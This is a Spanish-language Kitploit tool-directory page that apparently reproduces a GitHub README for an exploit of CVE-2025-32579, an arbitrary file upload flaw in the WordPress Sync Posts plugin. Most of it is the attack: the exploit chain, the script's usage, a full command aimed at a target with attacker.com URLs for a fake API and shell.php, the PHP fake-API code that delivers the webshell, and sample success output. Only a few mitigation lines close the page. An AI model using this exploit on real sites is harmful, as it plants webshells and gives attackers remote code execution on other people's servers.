Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32579 — El plugin WordPress Sync Posts <= 1.0 es vulnerable a la carga arbitraria de archivos. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-32579
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

El plugin WordPress Sync Posts <= 1.0 es vulnerable a la carga arbitraria de archivos.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚠️ CVE-2025-32579 - RCE crítico a través del plugin Sync Posts (WordPress)

📦 Afecta: Sync Posts <= 1.0
🧨 Puntuación CVSS: 9.9 CRÍTICA
📁 Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Resumen de la vulnerabilidad

El plugin Sync Posts de WordPress, creado por SoftClever Limited, es vulnerable a una vulnerabilidad de carga de archivos sin restricciones que permite a atacantes autenticados cargar y ejecutar archivos PHP arbitrarios (como webshells) en el servidor.

🔓 Causa raíz:

  • El plugin acepta una website_url que devuelve publicaciones JSON.
  • Descarga imágenes a ciegas desde el contenido de las publicaciones sin validación.
  • No se aplica ninguna restricción de tipo de archivo, tipo MIME ni ruta.
  • Todas las imágenes (incluso archivos PHP) se descargan y almacenan dentro de wp-content/uploads.

🚨 Por qué es peligroso

  • ✅ Ejecución remota de código (RCE)
  • ✅ Sube webshells directamente al servidor
  • ✅ Requiere privilegios mínimos (solo usuario autenticado)

⚙️ Descripción del script (Exploit)

El script de explotación automatiza toda la cadena:

  1. 📥 Inicia sesión en WordPress con las credenciales proporcionadas
  2. 🧠 Genera un PHP de API falso que devuelve una publicación JSON con un shell como <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 Envía una website_url maliciosa a admin-ajax.php?action=sync_posts
  4. 💣 Fuerza al plugin a descargar y guardar el shell en /uploads/
  5. ✅ No necesita Referer ni nonce — la cookie de sesión es suficiente

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Instrucciones de uso

📌 Formato del comando:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Argumentos:

También puedes usar una imagen de prueba en lugar de un shell real para probar:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 Ejemplo de salida de API falsa

Esta es la respuesta devuelta por Khaled_alenazi.php:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Explotación exitosa:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 Después de una explotación exitosa:

  • Ruta y nombre del shell: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Corrección / Mitigación

  • Restringe el acceso a website_url a dominios internos o hosts en lista blanca
  • Valida las extensiones de imagen y los tipos de contenido
  • Evita analizar JSON de terceros sin saneamiento

🧷 Referencia

CVE: CVE-2025-32579
Exploit por Nxploited (Khaled Alenazi)


Descargar herramienta
FlagDescription
-u, --urlURL de WordPress objetivo
-un, --usernameNombre de usuario de WordPress (admin)
-p, --passwordContraseña de WordPress
-ws, --websiteURL del archivo PHP malicioso que devuelve una publicación JSON falsa
-shell, --webshellEl archivo shell real para inyectar mediante ``